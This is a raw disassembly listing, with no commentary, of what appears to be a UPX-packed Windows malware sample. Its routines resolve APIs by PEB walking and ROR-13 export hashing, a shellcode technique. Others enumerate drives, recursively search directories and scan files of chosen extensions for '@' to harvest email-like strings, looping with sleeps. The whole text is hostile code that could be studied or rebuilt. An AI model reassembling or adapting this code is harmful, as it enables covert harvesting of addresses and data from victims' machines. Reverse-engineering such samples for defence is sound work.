; sub_4019DC+3E�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
push edi
mov ebp, [esp+10h+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_401C5B: ; CODE XREF: sub_401C42+36�j
jecxz short loc_401C8F
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
cld
loc_401C66: ; CODE XREF: sub_401C42+30�j
xor eax, eax
lodsb
cmp al, ah
jz short loc_401C74
ror edi, 0Dh
add edi, eax
jmp short loc_401C66
; ---------------------------------------------------------------------------
loc_401C74: ; CODE XREF: sub_401C42+29�j
cmp edi, [esp+10h+arg_0]
jnz short loc_401C5B
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
jmp short loc_401C91
; ---------------------------------------------------------------------------
loc_401C8F: ; CODE XREF: sub_401C42:loc_401C5B�j
xor eax, eax
loc_401C91: ; CODE XREF: sub_401C42+4B�j
mov edx, ebp
pop edi
pop esi
pop ebp
pop ebx
retn 4
sub_401C42 endp
; =============== S U B R O U T I N E =======================================
sub_401C9A proc near ; CODE XREF: sub_4019DC+B�p
push ebp
push esi
mov eax, large fs:30h
test eax, eax
js short loc_401CB2
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
jmp short loc_401CBB
; ---------------------------------------------------------------------------
loc_401CB2: ; CODE XREF: sub_401C9A+A�j
mov eax, [eax+34h]
mov ebp, [eax+0B8h]
loc_401CBB: ; CODE XREF: sub_401C9A+16�j
mov eax, ebp
pop esi
pop ebp
retn 4
sub_401C9A endp
; ---------------------------------------------------------------------------
db 0Fh dup(90h)
; ---------------------------------------------------------------------------
jmp loc_4019C0
; ---------------------------------------------------------------------------
db 4 dup(90h)
word_401CDA dw 0EAEBh ; DATA XREF: sub_404C60+4�o
; sub_404C60+34�o
dd 9090E8EBh, 0CCCCCC90h, 3 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_401CF0 proc near ; CODE XREF: sub_40C7C0+12F�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
call sub_418F60
mov eax, [esp+4+arg_0]
mov [esi+1Ch], eax
mov dword ptr [esi], offset off_4242AC
mov byte ptr [esi+20h], 0
mov eax, esi
pop esi
retn 4
sub_401CF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401D10 proc near ; CODE XREF: UPX0:004023B3�p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
push esi
mov esi, ecx
mov eax, [esi+8]
push 0
push eax
mov dword ptr [esi], offset off_4242AC
call dword_424068 ; TerminateThread
mov ecx, esi
pop esi
jmp sub_418F90
sub_401D10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401D30 proc near ; CODE XREF: sub_40C7C0+152�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov [ecx+18h], eax
mov eax, [esp+arg_4]
test eax, eax
jz short locret_401D4E
lea edx, [ecx+20h]
sub edx, eax
loc_401D44: ; CODE XREF: sub_401D30+1C�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_401D44
locret_401D4E: ; CODE XREF: sub_401D30+D�j
retn 8
sub_401D30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401D60 proc near ; CODE XREF: sub_401EB0+8F�p
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 10Ch
mov eax, dword_42A290
push ebx
mov ebx, [esp+110h+arg_4]
mov [esp+110h+var_4], eax
push esi
xor eax, eax
xor esi, esi
test ebx, ebx
mov [esp+114h+var_108], ecx
mov [esp+114h+var_10C], eax
jle loc_401E8A
push ebp
push edi
mov edi, [esp+11Ch+arg_0]
loc_401D98: ; CODE XREF: sub_401D60+11E�j
mov al, [edi+esi]
cmp al, 40h
lea ebp, [esi+1]
jnz loc_401E7A
test esi, esi
mov ecx, esi
jle short loc_401DC4
lea esp, [esp+0]
loc_401DB0: ; CODE XREF: sub_401D60+62�j
movzx eax, byte ptr [edi+ecx-1]
mov dl, byte_4242B8[eax]
test dl, dl
jz short loc_401DC4
dec ecx
test ecx, ecx
jg short loc_401DB0
loc_401DC4: ; CODE XREF: sub_401D60+4A�j
; sub_401D60+5D�j
cmp ebp, ebx
mov eax, ebp
jge short loc_401DE2
lea ebx, [ebx+0]
loc_401DD0: ; CODE XREF: sub_401D60+80�j
movzx edx, byte ptr [eax+edi]
cmp byte_4242B8[edx], 0
jz short loc_401DE2
inc eax
cmp eax, ebx
jl short loc_401DD0
loc_401DE2: ; CODE XREF: sub_401D60+68�j
; sub_401D60+7B�j
cmp ecx, eax
jge short loc_401E02
jmp short loc_401DF0
; ---------------------------------------------------------------------------
align 10h
loc_401DF0: ; CODE XREF: sub_401D60+86�j
; sub_401D60+A0�j
movzx edx, byte ptr [ecx+edi]
cmp byte_4242B8[edx], 2
jnz short loc_401E02
inc ecx
cmp ecx, eax
jl short loc_401DF0
loc_401E02: ; CODE XREF: sub_401D60+84�j
; sub_401D60+9B�j
lea edx, [ecx+3]
cmp edx, eax
jge short loc_401E7A
cmp ecx, esi
jge short loc_401E7A
cmp eax, ecx
jle short loc_401E2B
loc_401E11: ; CODE XREF: sub_401D60+C2�j
movzx ebx, byte ptr [edi+eax-1]
cmp byte_4242B8[ebx], 2
jnz short loc_401E24
dec eax
cmp eax, ecx
jg short loc_401E11
loc_401E24: ; CODE XREF: sub_401D60+BD�j
mov ebx, [esp+11Ch+arg_4]
loc_401E2B: ; CODE XREF: sub_401D60+AF�j
cmp eax, edx
jle short loc_401E7A
cmp eax, esi
jle short loc_401E7A
sub eax, ecx
mov esi, eax
cmp esi, 7
jl short loc_401E7A
mov eax, [esp+11Ch+var_10C]
inc eax
xor edx, edx
mov [esp+11Ch+var_10C], eax
add ecx, edi
lea esp, [esp+0]
loc_401E50: ; CODE XREF: sub_401D60+102�j
cmp edx, esi
jge short loc_401E64
mov al, [ecx]
mov [esp+edx+11Ch+var_104], al
inc edx
inc ecx
cmp edx, 0FEh
jb short loc_401E50
loc_401E64: ; CODE XREF: sub_401D60+F2�j
mov [esp+edx+11Ch+var_104], 0
mov edx, [esp+11Ch+var_108]
lea ecx, [esp+11Ch+var_104]
push ecx
mov ecx, [edx+18h]
call sub_408E20
loc_401E7A: ; CODE XREF: sub_401D60+40�j
; sub_401D60+A7�j ...
mov esi, ebp
cmp esi, ebx
jl loc_401D98
mov eax, [esp+11Ch+var_10C]
pop edi
pop ebp
loc_401E8A: ; CODE XREF: sub_401D60+29�j
mov ecx, [esp+114h+var_4]
pop esi
pop ebx
call sub_4192B6
add esp, 10Ch
retn 8
sub_401D60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401EB0 proc near ; CODE XREF: sub_401FC0+1FD�p
var_44 = dword ptr -44h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_1C = dword ptr -1Ch
var_14 = byte ptr -14h
arg_0 = dword ptr 4
arg_FFBC = dword ptr 0FFC0h
arg_FFE8 = dword ptr 0FFECh
arg_10004 = dword ptr 10008h
arg_1000C = dword ptr 10010h
mov eax, 1000Ch
call sub_4192D0
mov eax, dword_42A290
push ebx
push esi
xor ebx, ebx
push ebx
push 80h
push 3
push ebx
push 3
mov [esp+1Ch+arg_10004], eax
mov eax, [esp+1Ch+arg_1000C]
push 80000000h
push eax
mov [esp+24h+arg_0], ecx
call dword_424074 ; CreateFileA
mov esi, eax
cmp esi, ebx
jz loc_401F95
cmp esi, 0FFFFFFFFh
jz loc_401F95
push ebp
push edi
push ebx
lea ecx, [esp+30h+var_1C]
push ecx
push 0FFFDh
lea edx, [esp+38h+var_14]
push edx
push esi
xor edi, edi
xor ebp, ebp
mov [esp+40h+var_1C], ebx
call dword_424070 ; ReadFile
mov eax, [esp+40h+var_30]
cmp eax, ebx
jz short loc_401F73
loc_401F28: ; CODE XREF: sub_401EB0+C1�j
cmp eax, 0FFFFh
jnb short loc_401F73
mov ecx, [esp+40h+var_2C]
push eax
add edi, eax
mov [esp+eax+44h+var_28], bl
lea eax, [esp+44h+var_28]
push eax
call sub_401D60
add ebp, eax
jnz short loc_401F50
cmp edi, 4B000h
ja short loc_401F73
loc_401F50: ; CODE XREF: sub_401EB0+96�j
push ebx
lea ecx, [esp+44h+var_30]
push ecx
push 0FFFDh
lea edx, [esp+4Ch+var_28]
push edx
push esi
mov [esp+54h+var_30], ebx
call dword_424070 ; ReadFile
mov eax, [esp+54h+var_44]
cmp eax, ebx
jnz short loc_401F28
loc_401F73: ; CODE XREF: sub_401EB0+76�j
; sub_401EB0+7D�j ...
push esi
call dword_42406C ; CloseHandle
pop edi
pop ebp
pop esi
xor eax, eax
pop ebx
mov ecx, [esp+48h+arg_FFBC]
call sub_4192B6
add esp, 1000Ch
retn 4
; ---------------------------------------------------------------------------
loc_401F95: ; CODE XREF: sub_401EB0+40�j
; sub_401EB0+49�j
mov ecx, [esp+24h+arg_FFE8]
pop esi
mov eax, 1
pop ebx
call sub_4192B6
add esp, 1000Ch
retn 4
sub_401EB0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401FC0 proc near ; CODE XREF: sub_4021E0+186�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 18h
mov eax, dword_42A290
push esi
mov esi, [esp+1Ch+arg_4]
mov [esp+1Ch+var_4], eax
cmp dword ptr [esi+20h], 28h
mov [esp+1Ch+var_18], ecx
jb loc_4021C5
mov dl, [esi+2Ch]
xor eax, eax
or ecx, 0FFFFFFFFh
test dl, dl
push ebx
jz short loc_40200C
mov dl, 2Eh
mov edi, edi
loc_401FF0: ; CODE XREF: sub_401FC0+46�j
cmp eax, 0FFh
jge short loc_402008
cmp [esi+eax+2Ch], dl
jnz short loc_401FFF
mov ecx, eax
loc_401FFF: ; CODE XREF: sub_401FC0+3B�j
mov bl, [esi+eax+2Dh]
inc eax
test bl, bl
jnz short loc_401FF0
loc_402008: ; CODE XREF: sub_401FC0+35�j
test ecx, ecx
jge short loc_402013
loc_40200C: ; CODE XREF: sub_401FC0+2A�j
mov [esp+20h+var_14], 0
jmp short loc_402030
; ---------------------------------------------------------------------------
loc_402013: ; CODE XREF: sub_401FC0+4A�j
push 0Fh
lea eax, [ecx+esi+2Dh]
push eax
lea ecx, [esp+28h+var_14]
push ecx
call dword_42407C ; lstrcpyn
lea edx, [esp+20h+var_14]
push edx
call dword_4241E4 ; CharLowerA
loc_402030: ; CODE XREF: sub_401FC0+51�j
mov al, [esp+20h+var_14]
push ebp
push edi
xor edi, edi
test al, al
mov ebx, 32000h
jnz short loc_40204E
cmp dword ptr [esi+20h], 5000h
ja loc_4021AA
loc_40204E: ; CODE XREF: sub_401FC0+7F�j
push 4
push offset dword_428818
mov ecx, offset off_42AE60
mov edi, 1
call sub_406AE0
mov ebp, dword_424078
push eax
lea eax, [esp+2Ch+var_14]
push eax
call ebp ; lstrcmp
test eax, eax
jnz short loc_402080
mov ebx, 14000h
jmp loc_4021AA
; ---------------------------------------------------------------------------
loc_402080: ; CODE XREF: sub_401FC0+B4�j
push 3
push 5
push offset dword_42881C
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea ecx, [esp+30h+var_14]
push ecx
call sub_40F0D0
add esp, 0Ch
test eax, eax
jz loc_4021AA
push 3
push 5
push offset dword_428824
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea edx, [esp+30h+var_14]
push edx
call sub_40F0D0
add esp, 0Ch
test eax, eax
jz loc_4021AA
push 3
push 5
push offset dword_42882C
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea eax, [esp+30h+var_14]
push eax
call sub_40F0D0
add esp, 0Ch
test eax, eax
jz loc_4021AA
push 3
push 5
push offset dword_428834
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea ecx, [esp+30h+var_14]
push ecx
call sub_40F0D0
add esp, 0Ch
test eax, eax
jz loc_4021AA
push 3
push 5
push offset dword_42883C
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea edx, [esp+30h+var_14]
push edx
call sub_40F0D0
add esp, 0Ch
test eax, eax
jz short loc_4021AA
push 3
push 5
push offset dword_428844
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea eax, [esp+30h+var_14]
push eax
call sub_40F0D0
add esp, 0Ch
test eax, eax
jnz short loc_402175
mov ebx, 12C000h
jmp short loc_4021AA
; ---------------------------------------------------------------------------
loc_402175: ; CODE XREF: sub_401FC0+1AC�j
push 3
push 5
push offset dword_42884C
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea ecx, [esp+30h+var_14]
push ecx
call sub_40F0D0
add esp, 0Ch
test eax, eax
jz short loc_4021AA
push offset dword_4243B8
lea edx, [esp+2Ch+var_14]
push edx
call ebp ; lstrcmp
test eax, eax
jnz short loc_4021C2
loc_4021AA: ; CODE XREF: sub_401FC0+88�j
; sub_401FC0+BB�j ...
cmp [esi+20h], ebx
ja short loc_4021C2
cmp edi, 1
jnz short loc_4021C2
mov eax, [esp+28h+arg_0]
mov ecx, [esp+28h+var_18]
push eax
call sub_401EB0
loc_4021C2: ; CODE XREF: sub_401FC0+1E8�j
; sub_401FC0+1ED�j ...
pop edi
pop ebp
pop ebx
loc_4021C5: ; CODE XREF: sub_401FC0+19�j
mov ecx, [esp+1Ch+var_4]
pop esi
call sub_4192B6
add esp, 18h
retn 8
sub_401FC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4021E0 proc near ; CODE XREF: sub_4021E0+16B�p
; sub_4023D0+DB�p ...
var_264 = dword ptr -264h
var_260 = byte ptr -260h
var_148 = byte ptr -148h
var_11C = byte ptr -11Ch
var_11B = byte ptr -11Bh
var_11A = byte ptr -11Ah
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 264h
mov eax, dword_42A290
push ebx
mov [esp+268h+var_4], eax
mov eax, [ebp+arg_4]
test eax, eax
push esi
push edi
mov [esp+270h+var_264], ecx
jle loc_40238E
mov eax, [ebp+arg_0]
test eax, eax
jz loc_40238E
cmp byte ptr [eax], 0
jz loc_40238E
push eax
lea eax, [esp+274h+var_260]
push eax
call dword_424098 ; lstrcpy
lea ecx, [esp+270h+var_260]
lea ebx, [esp+270h+var_260]
push ecx
dec ebx
call dword_424094 ; lstrlen
cmp byte ptr [eax+ebx], 5Ch
jz short loc_402250
push offset word_4243BC
lea edx, [esp+274h+var_260]
push edx
call dword_424090 ; lstrcat
loc_402250: ; CODE XREF: sub_4021E0+5E�j
push 4
push offset dword_428854
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea eax, [esp+274h+var_260]
push eax
call dword_424090 ; lstrcat
xor eax, eax
mov ecx, 50h
lea edi, [esp+270h+var_148]
rep stosd
mov edi, dword_42408C
xor esi, esi
loc_402285: ; CODE XREF: sub_4021E0+FB�j
; sub_4021E0+10A�j ...
test esi, esi
jnz short loc_4022B1
lea ecx, [esp+270h+var_148]
push ecx
lea edx, [esp+274h+var_260]
push edx
call dword_424088 ; FindFirstFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_402377
test esi, esi
jz loc_402377
jmp short loc_4022C8
; ---------------------------------------------------------------------------
loc_4022B1: ; CODE XREF: sub_4021E0+A7�j
lea eax, [esp+270h+var_148]
push eax
push esi
call dword_424084 ; FindNextFileA
test eax, eax
jz loc_402370
loc_4022C8: ; CODE XREF: sub_4021E0+CF�j
cmp [esp+270h+var_11C], 2Eh
jnz short loc_4022EC
mov al, [esp+270h+var_11B]
test al, al
jz short loc_402285
cmp al, 2Eh
jnz short loc_4022EC
mov al, [esp+270h+var_11A]
test al, al
jz short loc_402285
loc_4022EC: ; CODE XREF: sub_4021E0+F0�j
; sub_4021E0+FF�j
mov ecx, [ebp+arg_0]
push ecx
lea edx, [esp+274h+var_260]
push edx
call dword_424098 ; lstrcpy
lea eax, [esp+270h+var_260]
push eax
call dword_424094 ; lstrlen
cmp byte ptr [eax+ebx], 5Ch
jz short loc_40231C
push offset word_4243BC
lea ecx, [esp+274h+var_260]
push ecx
call dword_424090 ; lstrcat
loc_40231C: ; CODE XREF: sub_4021E0+12A�j
lea edx, [esp+270h+var_11C]
push edx
lea eax, [esp+274h+var_260]
push eax
call dword_424090 ; lstrcat
test [esp+270h+var_148], 10h
jz short loc_402355
push 4Bh
call edi ; Sleep
mov ecx, [ebp+arg_4]
dec ecx
push ecx
mov ecx, [esp+274h+var_264]
lea edx, [esp+274h+var_260]
push edx
call sub_4021E0
jmp loc_402285
; ---------------------------------------------------------------------------
loc_402355: ; CODE XREF: sub_4021E0+157�j
lea eax, [esp+270h+var_148]
push eax
lea ecx, [esp+274h+var_260]
push ecx
mov ecx, [esp+278h+var_264]
call sub_401FC0
jmp loc_402285
; ---------------------------------------------------------------------------
loc_402370: ; CODE XREF: sub_4021E0+E2�j
push esi
call dword_424080 ; FindClose
loc_402377: ; CODE XREF: sub_4021E0+C1�j
; sub_4021E0+C9�j
xor eax, eax
mov ecx, [esp+270h+var_4]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_40238E: ; CODE XREF: sub_4021E0+24�j
; sub_4021E0+2F�j ...
mov ecx, [esp+270h+var_4]
mov eax, 1
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_4021E0 endp
; ---------------------------------------------------------------------------
align 10h
loc_4023B0: ; DATA XREF: UPX0:off_4242AC�o
push esi
mov esi, ecx
call sub_401D10
test byte ptr [esp+8], 1
jz short loc_4023C8
push esi
call sub_41930D
add esp, 4
loc_4023C8: ; CODE XREF: UPX0:004023BD�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4023D0 proc near ; DATA XREF: UPX0:004242B0�o
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_117 = word ptr -117h
var_115 = byte ptr -115h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_4023D0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 110h
mov eax, dword_42A290
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov ebx, ecx
push 0FFFFFFFEh
mov [ebp+var_14], eax
mov [ebp+var_11C], ebx
mov [ebp+var_4], 0
call dword_4240A4 ; GetCurrentThread
push eax
call dword_4240A0 ; SetThreadPriority
add ebx, 20h
mov edi, offset byte_4243C3
mov esi, ebx
mov ecx, 1
xor eax, eax
repe cmpsb
jz loc_4024C6
push 0Ah
push offset dword_4287F8
mov ecx, offset off_42AE60
call sub_406AE0
push eax
push ebx
call sub_419312
add esp, 8
test eax, eax
jnz short loc_4024B8
mov cx, word_4243C0
mov dl, byte_4243C2
mov esi, dword_42409C
mov [ebp+var_117], cx
mov [ebp+var_115], dl
mov [ebp+var_118], 43h
lea esp, [esp+0]
loc_402480: ; CODE XREF: sub_4023D0+E6�j
cmp [ebp+var_118], 5Ah
jge short loc_4024C6
lea eax, [ebp+var_118]
push eax
call esi ; GetDriveTypeA
cmp eax, 3
jz short loc_40249C
cmp eax, 6
jnz short loc_4024B0
loc_40249C: ; CODE XREF: sub_4023D0+C5�j
push 0Fh
lea ecx, [ebp+var_118]
push ecx
mov ecx, [ebp+var_11C]
call sub_4021E0
loc_4024B0: ; CODE XREF: sub_4023D0+CA�j
inc [ebp+var_118]
jmp short loc_402480
; ---------------------------------------------------------------------------
loc_4024B8: ; CODE XREF: sub_4023D0+80�j
mov ecx, [ebp+var_11C]
push 0Fh
push ebx
call sub_4021E0
loc_4024C6: ; CODE XREF: sub_4023D0+5D�j
; sub_4023D0+B7�j
; DATA XREF: ...
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov ecx, [ebp+var_14]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4023D0 endp
; =============== S U B R O U T I N E =======================================
sub_4024DF proc near ; DATA XREF: UPX0:004262A4�o
mov eax, offset loc_4024C6
retn
sub_4024DF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4024F0 proc near ; CODE XREF: sub_40C480+256�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
call sub_418F60
mov eax, [esp+4+arg_0]
mov [esi+20h], eax
xor eax, eax
mov [esi+18h], eax
mov [esi+1Ch], eax
mov dword ptr [esi], offset off_4243C4
mov eax, esi
pop esi
retn 4
sub_4024F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402520 proc near ; CODE XREF: UPX0:00402783�p
mov dword ptr [ecx], offset off_4243C4
jmp sub_418F90
sub_402520 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402530 proc near ; CODE XREF: sub_40C7C0+EB�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword ptr [ecx+1Ch], 1
mov [ecx+24h], eax
retn 4
sub_402530 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402550 proc near ; DATA XREF: UPX0:004243C8�o
var_31C = byte ptr -31Ch
var_31B = word ptr -31Bh
var_319 = byte ptr -319h
var_30C = byte ptr -30Ch
var_2CC = byte ptr -2CCh
var_28C = byte ptr -28Ch
var_24C = byte ptr -24Ch
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
sub esp, 31Ch
mov eax, dword_42A290
push ebp
mov ebp, ecx
mov [esp+320h+var_4], eax
mov eax, [ebp+1Ch]
test eax, eax
jz loc_402761
push 0FFFFFFFEh
call dword_4240A4 ; GetCurrentThread
push eax
call dword_4240A0 ; SetThreadPriority
push 0
call sub_419875
push eax
call sub_419846
mov eax, [ebp+18h]
add esp, 8
test eax, eax
jnz loc_402761
push ebx
mov ebx, dword_42408C
push esi
push edi
loc_4025A3: ; CODE XREF: sub_402550+208�j
mov ax, word_4243C0
mov cl, byte_4243C2
mov [esp+32Ch+var_31B], ax
mov [esp+32Ch+var_319], cl
mov [esp+32Ch+var_31C], 43h
lea ecx, [ecx+0]
loc_4025C0: ; CODE XREF: sub_402550+1F6�j
lea edx, [esp+32Ch+var_31C]
push edx
call dword_42409C ; GetDriveTypeA
cmp eax, 3
jz short loc_4025DE
cmp eax, 6
jz short loc_4025DE
cmp eax, 4
jnz loc_40273A
loc_4025DE: ; CODE XREF: sub_402550+7E�j
; sub_402550+83�j
xor eax, eax
loc_4025E0: ; CODE XREF: sub_402550+9E�j
mov cl, [esp+eax+32Ch+var_31C]
mov [esp+eax+32Ch+var_20C], cl
inc eax
test cl, cl
jnz short loc_4025E0
xor eax, eax
loc_4025F2: ; CODE XREF: sub_402550+B0�j
mov cl, [esp+eax+32Ch+var_31C]
mov [esp+eax+32Ch+var_108], cl
inc eax
test cl, cl
jnz short loc_4025F2
lea eax, [esp+32Ch+var_24C]
push eax
call sub_40E760
lea ecx, [esp+330h+var_30C]
push ecx
call sub_40EB20
lea edx, [esp+334h+var_28C]
push edx
call sub_40E8B0
lea eax, [esp+338h+var_2CC]
push eax
call sub_40EAE0
lea eax, [esp+33Ch+var_24C]
add esp, 10h
mov edx, eax
lea esp, [esp+0]
loc_402640: ; CODE XREF: sub_402550+F5�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402640
lea edi, [esp+32Ch+var_20C]
sub eax, edx
dec edi
loc_402651: ; CODE XREF: sub_402550+107�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_402651
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [esp+32Ch+var_28C]
rep movsb
mov ecx, eax
loc_402672: ; CODE XREF: sub_402550+127�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402672
lea edi, [esp+32Ch+var_108]
sub eax, ecx
mov esi, ecx
dec edi
loc_402685: ; CODE XREF: sub_402550+13B�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_402685
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [esp+32Ch+var_30C]
rep movsb
mov ecx, eax
loc_4026A1: ; CODE XREF: sub_402550+156�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4026A1
lea edi, [esp+32Ch+var_20C]
sub eax, ecx
mov esi, ecx
dec edi
loc_4026B4: ; CODE XREF: sub_402550+16A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4026B4
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
lea eax, [esp+32Ch+var_2CC]
rep movsb
mov ecx, eax
loc_4026D0: ; CODE XREF: sub_402550+185�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4026D0
lea edi, [esp+32Ch+var_108]
sub eax, ecx
mov esi, ecx
dec edi
loc_4026E3: ; CODE XREF: sub_402550+199�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4026E3
mov edx, [ebp+24h]
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
lea ecx, [esp+32Ch+var_20C]
push ecx
add edx, 64Ch
push edx
call sub_404660
mov ecx, [ebp+24h]
lea eax, [esp+334h+var_108]
push eax
add ecx, 67Ch
push ecx
call sub_404660
add esp, 10h
call sub_419853
cdq
mov ecx, 14Dh
idiv ecx
push edx
call ebx ; Sleep
loc_40273A: ; CODE XREF: sub_402550+88�j
mov al, [esp+32Ch+var_31C]
inc al
cmp al, 5Ah
mov [esp+32Ch+var_31C], al
jl loc_4025C0
push 927C0h
call ebx ; Sleep
mov eax, [ebp+18h]
test eax, eax
jz loc_4025A3
pop edi
pop esi
pop ebx
loc_402761: ; CODE XREF: sub_402550+1A�j
; sub_402550+44�j
mov ecx, [esp+320h+var_4]
pop ebp
call sub_4192B6
add esp, 31Ch
retn
sub_402550 endp
; ---------------------------------------------------------------------------
align 10h
loc_402780: ; DATA XREF: UPX0:off_4243C4�o
push esi
mov esi, ecx
call sub_402520
test byte ptr [esp+8], 1
jz short loc_402798
push esi
call sub_41930D
add esp, 4
loc_402798: ; CODE XREF: UPX0:0040278D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027A0 proc near ; CODE XREF: sub_40C480+289�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
push 0FFFFFFFFh
push offset SEH_4027A0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push esi
mov esi, ecx
push edi
mov [esp+18h+var_10], esi
call sub_418F60
mov eax, [esp+18h+arg_0]
push 78h
mov [esp+1Ch+var_4], 0
mov dword ptr [esi], offset off_4243CC
mov [esi+24h], eax
call sub_4191BC
add esp, 4
mov [esi+28h], eax
xor edi, edi
jmp short loc_4027F0
; ---------------------------------------------------------------------------
align 10h
loc_4027F0: ; CODE XREF: sub_4027A0+47�j
; sub_4027A0+69�j
push 100h
call sub_4191BC
mov ecx, [esi+28h]
mov [edi+ecx], eax
add edi, 4
add esp, 4
cmp edi, 78h
jl short loc_4027F0
push 28h
call sub_4191BC
add esp, 4
mov [esi+2Ch], eax
xor edi, edi
lea ebx, [ebx+0]
loc_402820: ; CODE XREF: sub_4027A0+99�j
push 100h
call sub_4191BC
mov edx, [esi+2Ch]
mov [edi+edx], eax
add edi, 4
add esp, 4
cmp edi, 28h
jl short loc_402820
push 20h
mov dword ptr [esi+238h], 0
mov dword ptr [esi+23Ch], 0
call sub_4191BC
mov ecx, [esp+1Ch+var_C]
add esp, 4
mov [esi+230h], eax
pop edi
mov eax, esi
pop esi
mov large fs:0, ecx
add esp, 10h
retn 4
sub_4027A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402880 proc near ; CODE XREF: UPX0:00403933�p
push esi
push edi
mov edi, ecx
mov dword ptr [edi], offset off_4243CC
xor esi, esi
lea esp, [esp+0]
loc_402890: ; CODE XREF: sub_402880+25�j
mov eax, [edi+28h]
mov ecx, [eax+esi]
push ecx
call sub_4198AE
add esi, 4
add esp, 4
cmp esi, 78h
jl short loc_402890
mov edx, [edi+28h]
push edx
call sub_4198AE
add esp, 4
xor esi, esi
loc_4028B5: ; CODE XREF: sub_402880+4A�j
mov eax, [edi+2Ch]
mov ecx, [esi+eax]
push ecx
call sub_4198AE
add esi, 4
add esp, 4
cmp esi, 28h
jl short loc_4028B5
mov edx, [edi+2Ch]
push edx
call sub_4198AE
mov eax, [edi+230h]
push eax
call sub_4198AE
add esp, 8
mov ecx, edi
pop edi
pop esi
jmp sub_418F90
sub_402880 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
